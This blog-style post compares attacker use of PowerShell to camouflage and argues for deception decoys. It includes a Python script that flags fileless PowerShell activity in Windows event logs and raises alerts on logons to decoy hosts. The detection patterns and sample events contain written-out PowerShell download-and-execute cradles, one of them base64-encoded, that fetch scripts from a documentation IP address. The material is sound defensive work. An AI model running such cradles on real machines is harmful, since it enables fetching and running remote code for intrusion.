I was musing on the notion of camouflage recently. I’d seen a tortoiseshell cat in some undergrowth and was astonished at how well it blended in, despite being a significantly different color than the surrounding territory. In fact, I only actually even SAW the cat because it moved. I had clearly got a little close and startled it, and it was the movement that alerted me.
A recent Carbon Black report describing cyber-attackers’ growing use of native tools already present on compromised operating systems struck me as particularly interesting. We know from Mandiant’s recent M-Report that an attacker can achieve privilege escalation in as little as three days and go undetected for nearly a year. With stealth of that order, it makes perfect sense that native tools, which the host operating system (and the staff operating it) usually trust unconditionally, are the ones chosen for attacks.
PowerShell is one such native tool that can be used to infiltrate a company. Seen in 38% of attacks, with an alarming absence of security alerts before those attacks were investigated, PowerShell represents excellent camouflage. Attackers who leverage PowerShell are very likely to go undetected for two reasons: it can download and execute code entirely in memory, without ever writing a file to disk for file-based antivirus to scan, and it is commonly used for legitimate purposes (e.g. routine administrative tasks by the IT team), so its mere presence raises no suspicion. Given also that PowerShell featured in 61% of Command and Control activity, 47% of activity involving lateral movement and 37% of privilege escalations, it lets attackers turn ordinary administrative capability to malicious ends. PowerShell must clearly be taken very seriously by security teams seeking to gain the advantage.
PowerShell is overwhelmingly used for legitimate purposes in production environments, so attempts to reduce the risk by tightening controls on it are likely to disrupt business-as-usual for already overworked IT teams. In this situation, a Deception-based solution is a worthy adjunct to the security arsenal. A Deception solution presents decoys that are indistinguishable from production IT assets to a PowerShell-scripted attack, and produces high-fidelity alerts when such an attack attempts to move laterally toward the decoy traps: no legitimate process has any business touching a decoy, so a single interaction is enough to raise an alert. Because decoys only fire when the attacker touches them, they complement rather than replace the host-side logging that records what PowerShell actually ran.
Integrated egress traffic monitoring in a Deception solution makes it possible to quickly identify Command and Control activity that other controls may miss. The best Deception solutions also reveal the credentials an attacker uses the moment they interact with a decoy trap. This lets security teams see at once which accounts the attacker holds, and therefore whether privilege escalation has already been achieved, and then mobilize to disable the compromised accounts before data is lost.
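As an added example (not code from the original post, and not any Deception vendor’s product logic), the following Python script runs the two checks described above over a handful of constructed Windows event records: it classifies PowerShell script-block log entries (Event ID 4104) for in-memory download-and-execute behaviour, including payloads hidden behind -EncodedCommand, and it treats any logon recorded on a decoy host as an alert that names the credential in use. The decoy hostnames, account names, IP addresses and the sample events are all assumptions made up for the example.

```python
import base64
import re

# Hypothetical decoy inventory (assumed names): no legitimate user or job ever logs on to these.
DECOY_HOSTS = {"FS-BACKUP02", "SQL-ARCHIVE01"}

# Indicators that a script block fetches and runs code in memory rather than from a dropped file.
INDICATOR_PATTERNS = {
    "download-cradle": re.compile(
        r"Net\.WebClient|DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|\bcurl\b", re.I),
    "in-memory-exec": re.compile(
        r"Invoke-Expression|\bIEX\b|\[Reflection\.Assembly\]::Load|FromBase64String", re.I),
    "evasion-flags": re.compile(
        r"(?<!\S)-(?:nop|noprofile|w(?:indowstyle)?\s+hidden|ep\s+bypass|ExecutionPolicy\s+bypass)\b",
        re.I),
}
ENCODED_RE = re.compile(r"(?<!\S)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)
URL_RE = re.compile(r"https?://[^\s'\"()]+", re.I)


def decode_encoded_command(text):
    """Return the payload hidden behind -EncodedCommand, or None.
    PowerShell expects the base64 to decode to UTF-16LE, not UTF-8, so decode accordingly."""
    m = ENCODED_RE.search(text)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def inspect_script_block(script_text):
    """Inspect one Event ID 4104 ScriptBlockText (or a command line) and return
    {"indicators": [...], "urls": [...]}; both lists are empty for benign input."""
    indicators = set()
    # Scan the text with the base64 blob removed: base64 can contain accidental
    # matches such as '/IEX+', so the decoded payload is scanned instead of the blob.
    samples = [ENCODED_RE.sub(" ", script_text)]
    if ENCODED_RE.search(script_text):
        indicators.add("encoded-command")
        decoded = decode_encoded_command(script_text)
        if decoded is not None:
            samples.append(decoded)
    urls = []
    for sample in samples:
        for name, pattern in INDICATOR_PATTERNS.items():
            if pattern.search(sample):
                indicators.add(name)
        urls.extend(URL_RE.findall(sample))  # candidate C2 / staging hosts for egress monitoring
    return {"indicators": sorted(indicators), "urls": urls}


def inspect_logon(event):
    """A logon (4624) or failed logon (4625) recorded ON a decoy host is an alert by
    construction: nothing legitimate should be there. The account named in the event
    is the credential the attacker is using, which is what the SOC needs to disable."""
    if event["Computer"].split(".")[0].upper() not in DECOY_HOSTS:
        return None
    account = f"{event['TargetDomainName']}\\{event['TargetUserName']}"
    return {
        "alert": "decoy-interaction",
        "decoy": event["Computer"],
        "account": account,
        "source": event.get("IpAddress", "-"),
        "outcome": "success" if event["EventID"] == 4624 else "failure",
        "action": f"disable {account}; investigate {event.get('IpAddress', '-')}",
    }


def scan(events):
    """Run both checks over a list of event dicts and return the alerts raised."""
    alerts = []
    for ev in events:
        if ev["EventID"] == 4104:
            result = inspect_script_block(ev["ScriptBlockText"])
            if result["indicators"]:
                alerts.append({"alert": "powershell-fileless", "host": ev["Computer"], **result})
        elif ev["EventID"] in (4624, 4625):
            alert = inspect_logon(ev)
            if alert:
                alerts.append(alert)
    return alerts


# Constructed sample events (not real telemetry); field names follow the Windows event schema.
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.7/b.ps1')"
SAMPLE_EVENTS = [
    {"EventID": 4104, "Computer": "WKS-IT01.corp.example",
     "ScriptBlockText": "Get-Service | Where-Object Status -eq 'Running'"},
    {"EventID": 4104, "Computer": "WKS-0413.corp.example",
     "ScriptBlockText": "powershell -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
                        ".DownloadString('http://203.0.113.7/a.ps1')\""},
    {"EventID": 4104, "Computer": "WKS-0413.corp.example",
     "ScriptBlockText": "powershell -enc "
                        + base64.b64encode(PAYLOAD.encode("utf-16-le")).decode("ascii")},
    {"EventID": 4624, "Computer": "FS-BACKUP02.corp.example", "TargetDomainName": "CORP",
     "TargetUserName": "svc_backup", "IpAddress": "10.20.30.41"},
    {"EventID": 4624, "Computer": "FS-PROD01.corp.example", "TargetDomainName": "CORP",
     "TargetUserName": "jsmith", "IpAddress": "10.20.30.12"},
]

if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(alert)
```

The routine administrative command produces no alert, the two download cradles do (one of them only after the UTF-16LE base64 payload is decoded, which is the step naive string matching on the raw log line misses), and the logon against the decoy produces an alert that already carries the account to disable and the source address to investigate.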
As with all good camouflage, PowerShell might well obscure an attacker from view very effectively. However, as soon as they move, they can be caught with a good Deception solution that encourages movement and facilitates capture.